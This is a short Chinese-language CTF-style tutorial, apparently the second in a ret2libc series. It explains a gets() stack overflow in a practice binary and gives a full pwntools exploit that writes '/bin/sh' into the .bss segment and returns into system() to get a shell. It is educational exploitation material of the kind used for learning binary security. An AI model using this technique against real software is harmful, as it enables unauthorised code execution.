和Ret2Libc(1)一樣，先把程式扔進IDA看看程式碼

 和Ret2Libc(1)一樣，gets存在溢位漏洞

gdb-peda$ checksec
CANARY    : disabled
FORTIFY   : disabled
NX        : ENABLED
PIE       : disabled
RELRO     : Partial

可以看到程式開啟了NX，

我的linux已經開啟了ASLR

存在system函式，地址為 0x08048490

不存在‘/bin/sh'欄位

漏洞利用思路：

程式中既然找不到‘/bin/sh‘，那我們就需要想辦法輸入進去，恰好用objdump發現存在gets函式 ，地址為0x08048460

而且還存在也就說明，我們可以手動把shellcode輸入進去，然後存放進bss段裡面，最後把這個bss地址傳給system來呼叫shellcode

1、用gets的地址覆蓋函式返回地址

2、構造gets的返回地址，（因為gets輸入shellcode後，我們就要呼叫system函式來getshell，所以gets的返回地址是system函式的呼叫地址，即system_plt）

3、構造gets需要的引數(就是存放輸入字串的地址，bss段0x804A080)

4、構造system的引數(就是存放輸入字串的地址，bss段0x804A080)

exp：

from pwn import *
bss_addr = 0x0804A080
gets_plt = 0x08048460
sys_plt  = 0x08048490

io=process('./ret2libc2')
io.recvuntil('What do you think ?')
payload = 'A'*112 + p32(gets_plt) + p32(sys_plt) + p32(bss_addr) + p32(bss_addr)
io.sendline(payload)
io.sendline('/bin/sh')
io.interactive()